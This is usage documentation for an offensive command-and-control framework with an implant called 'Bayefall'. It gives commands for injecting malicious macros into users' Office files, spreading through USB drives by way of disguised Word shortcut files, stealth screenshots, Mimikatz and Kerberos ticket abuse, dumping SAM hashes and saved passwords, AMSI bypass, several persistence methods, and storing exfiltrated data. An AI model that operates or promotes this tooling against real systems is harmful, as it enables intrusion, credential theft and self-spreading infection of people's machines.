Before going further, note that all screenshots taken will be saved in ./files/Downloads/screenshots/.
All smart-shots will be saved in ./files/Downloads/screenshots/window_title_name.pgn, and all downloaded data will be stored in ./files/Downloads/exfiltrated_data/.
Additionally, all Bayefall logs are stored in ./files/Downloads/logs/.

You can use the report.py script located in files/tools/ to generate a report in HTML format, which can be opened in your browser. The report.py script requires to be run from the project dir cd mbeubeu-c2. Example usage:

python3 files/tools/report.py 

The report_start and report_stop commands are used to serve the index.html report page, which allows login with a randomly generated username and password. The URL will be based on the TeamServer's IP address and port.

report_start

Interactive mode

When a new Bayefall is registered, you can use the interact command to interact with the Bayefall.

The Bayefall name looks like SRV01@2025-05-14-22-35-30, which is the target hostname and the first seen timestamp separated by @. Keep in mind that if the Bayefall has non-privileged access, the interactive console color will be blue. If it has privileged access, the console color will be red.

interact 'bayefall_name'

office_infect

Command fo Weaponize Office docs. This look docm or xlsm file into all users Desktop and Documents dir then infect them

• Scans for .docm/.xlsm files
• Injects malicious macros

The .bin file can be extracted using the unzip command: unzip -d extracted_macro file.docm. Then, navigate to the word or xlm directory to find the .bin file. You only need this file for the office_infect command.

office_infect /home/p4p4/vbaProject.bin

smart_shot

Stealth Screenshots: Command to take screenshots based on window titles. I’ve provided a titles.txt file so you can choose the window titles you want.

smart_shot file_content_titles time_in_second 

smart_shot titles.txt 5000

usb_infect

USB Propagation: This command monitors plugged-in USB devices and automatically infects them.
You only need to provide a payload.exe file and a document file. It will then create hidden files along with a .lnk file that uses the same icon as Microsoft Word.

usb_infect Ndobin.exe invoice.docx NoSuspectName 60

pwsploit

Powersploit Integration: Currently, only the Mimikatz and Recon modules are available. The Recon module uses all PowerView commands, while the Mimikatz module supports all Invoke-Mimikatz commands.

pwsploit recon Get-Domain

pwsploit mimikatz "privilege::debug"

bof_execute

Beacon Object Files: The bof_execute command lets you choose an available BOF command (use tab completion to display available commands) or provide your own BOF file as args[1]

[💀 bayefall (DC01 | 2025-09-29-10-33-08) ] > bof_execute -h

BOF Situational Awareness :
================================
enum_whoami                     Enumerate current user privileges
enum_localusers                 Enumerate local user accounts
enum_domaingroups               Enumerate domain groups
enum_localgroups                Enumerate local groups
enum_domainusers                Enumerate domain user accounts
enum_domaingroupmembers         Enumerate domain group memberships
enum_arpscan                    Enumerate local network using ARP scan
enum_services                   Enumerate running and stopped services
enum_firewallrules              List configured Windows Firewall rules
enum_routeprint                 Display network routes
enum_sessioninfo                Get session and login info
enum_localsessions              Enumerate local user sessions
enum_schtasks                   List scheduled tasks
enum_notpad                     Show notepad contents
enum_listdns                    List DNS
enum_azure_ad_joininfo          Enum Azure AD Info
enum_env                        Show environdment varibales
enum_resources                  Show Resources
enum_ipconfig                   Show IP configuration
enum_netstat                    Display network connections
enum_adcs                       Enumerate AD CS Certificate Templates and configuration

BOF Local Privilege Escalation :
====================================
priv_unquoted                   Find unquoted service paths for privilege escalation
priv_modifiableautorun          Detect user-modifiable autoruns
priv_tokenprivileges            Display token privileges
priv_alwaysinstallelevated      Check AlwaysInstallElevated settings

BOF Kerberos Abuse :
======================
rubeus_asktgt                   Request a TGT for a user/password
rubeus_asktgs                   Request TGS ticket from TGT
rubeus_asreproasting            Enumerate users vulnerable to AS-REP roasting
rubeus_cross_s4u                Perform cross-domain S4U2self + S4U2proxy
rubeus_dump                     Dump Kerberos tickets from memory
rubeus_kerberoasting            Request TGS tickets for Kerberoasting
rubeus_ptt                      Pass-the-Ticket: Inject Kerberos tickets
rubeus_renew                    Renew TGT using Rubeus
rubeus_tgtdeleg                 Extract TGT from TGT delegation context
rubeus_changepw                 Change user password via Kerberos
rubeus_describe                 Describe ticket content
rubeus_hash                     Calculate Kerberos-compatible password hashes
rubeus_klist                    List Kerberos tickets
rubeus_purge                    Delete all Kerberos tickets)
rubeus_s4u                      S4U constrained delegation
rubeus_triage                   Summarize Kerberos tickets and session info

BOF Credentials  :
======================
askcreds                        Prompt for Credentials
autologon                      Registry autologon information
credman                        Windows Credential Manager saved web passwords
hashdump                      Dump SAM Hashes

	

bof_execute /local/bof/file.o

pwsh-import

PowerShell Integration: This feature allows you to import PowerShell scripts and use the pwsh-execute command to run functions from them. All imported scripts still bypass AMSI. Please refer to the OPSEC page for details on how the bypass is implemented.

pwsh-import Invoke-Mimikatz.ps1

 pwsh-execute Invoke-Mimikatz -Command "privilege::debug"

Note: Only one script can be imported at a time

persist_*

The persistence module allows you to establish persistence using various techniques such as: startup folder, Winlogon, registry run keys, and scheduled tasks

persist_startup user/system

persist_winlogon user/system

persist_resgistryrun user/system

persist_schtask user/system

Note that persist commands will not work if you are using the powershell oneliner, because it injects a process, while the persist command relies on os.Executable().
Tip: a one_liner should not be run on a victim machine. It is intended for use in "assumed breach" scenarios where you have full physical control over the machine. If you use the one_liner on an uncontrolled machine, your C2 IP address may be exposed and subsequently banned, so take precautions

defence-analysis

The defence-analysis command allows you to analyze the target's defensive posture and receive a security hardness score. This technique was inspired by Ahmed Khlief's Ninja-C2.

defence-analysis

Use help command to show available bayefall commands.

[💀 bayefall (SRV01 | 2025-05-14-22-35-30) ] > help

Note: All SharpView commands are also available, but they are not OPSEC-safe.